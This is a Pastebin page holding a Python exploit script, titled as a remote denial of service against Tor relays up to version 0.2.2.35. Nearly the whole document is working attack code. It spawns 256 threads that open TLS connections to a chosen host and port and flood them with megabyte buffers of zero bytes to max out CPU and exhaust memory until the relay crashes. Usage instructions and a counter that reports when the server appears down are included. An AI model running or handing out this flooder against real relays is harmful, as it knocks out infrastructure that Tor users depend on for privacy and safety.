Guest User

Tor relay denial of service

a guest
May 20th, 2012
143
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2. # Exploit Title:        Tor relay remote denial of service
  3. # Date:                 12-04-2012
  4. # Software link:        https://www.torproject.org/
  5. # Version:              <= 0.2.2.35
  6. # Tested on:            Linux
  7. #
  8. # This code has 2 effects :
  9. #  - Imediatly incrase the CPU usage of the server to ~ 100 %
  10. #  - Hudge memory usage, if the ratio bandwich / RAM is higth this code can make Tor use all the avaiable memory and crash (works great on 127.0.0.1)
  11. #
  12. # Usage:        python exploit.py host port
  13. # Exemple:      python exploit.py localhost 9001
  14.  
  15. import socket, ssl
  16. import time
  17. import os
  18. import threading
  19. import sys
  20. import random
  21.  
  22. if len(sys.argv) != 3 or not sys.argv[2].isdigit():
  23.     sys.stderr.write(" Usage : " + sys.argv[0] + " host port\n")
  24.     os._exit(-1)
  25.  
  26. t0 = time.time()
  27. buff = chr(0) * 1000000
  28.  
  29. target = (sys.argv[1], int(sys.argv[2]))
  30.  
  31. error = 0
  32.  
  33. class   Error:
  34.     def __init__(self):
  35.         self.count = 0
  36.         self.lock = threading.Lock()
  37.  
  38.     def error(self, msg, pound):
  39.         self.lock.acquire()
  40.         print " [!] Error : " + msg
  41.         self.count += pound
  42.         if self.count > 42:
  43.             print " [!] Too many errors ! (Server may be down)"
  44.             print " [+] Exiting ..."
  45.             os._exit(0)
  46.         self.lock.release()
  47.  
  48. def     flood(target, err):
  49.     while True:
  50.         try:
  51.             try:
  52.                 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  53.                 sock.connect(target)
  54.                 ssl_sock = ssl.wrap_socket(sock)
  55.                 ssl_sock.do_handshake()
  56.             except:
  57.                 err.error("Can not connect", 1)
  58.             while True:
  59.                 ssl_sock.sendall(buff) # Yes, we just send ssl-zipped 0x00 ...
  60.         except:
  61.             err.error("Socket reset (server timeout)", 0)
  62.  
  63. threads = []
  64. err = Error()
  65. for i in range(256):
  66.     print " [+] starting a new thread"
  67.     threads.append(threading.Thread(target = flood, args = [target, err]))
  68.     threads[i].start()
  69.     if i < 20:
  70.         time.sleep(1)
  71.     elif i < 128:
  72.         time.sleep(3 + random.random())
  73.     else:
  74.         time.sleep(7 + random.random())
RAW Paste Data